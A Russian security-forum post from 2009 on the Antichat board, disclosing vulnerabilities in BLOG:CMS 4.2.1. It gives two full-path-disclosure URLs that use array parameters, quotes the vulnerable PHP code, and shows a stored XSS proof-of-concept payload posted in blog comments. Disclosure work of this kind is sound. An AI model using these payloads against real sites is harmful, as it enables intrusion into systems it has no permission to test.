ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу [ Обзор уязвимостей в блогах (кроме WР) ]
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

BLOG:CMS 4.2.1
  #7  
Старый 08.11.2009, 06:03
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию BLOG:CMS 4.2.1
BLOG:CMS v4.2.1
Раскрытие путей
Цитата:
/?query[]=1234&blogid=1
Уязвимой код:
PHP код:
$this->formdata = array(
            'id' => $blog?$blog->getID():$CONF['DefaultBlog'],
            'query' => htmlspecialchars(getVar('query')),
        ); 
Цитата:
/photo/index.php?gallery[]=Corvette
Уязвимый код:
PHP код:
$_REQUEST array_map("htmlentities"$_REQUEST); 
Активная XSS
Уязвимость находиться в комментариях к блогу (Его записям).
Цитата:
[a href=javascript:alert();]Free Porno![/a]
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Форумы 48 28.12.2009 20:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ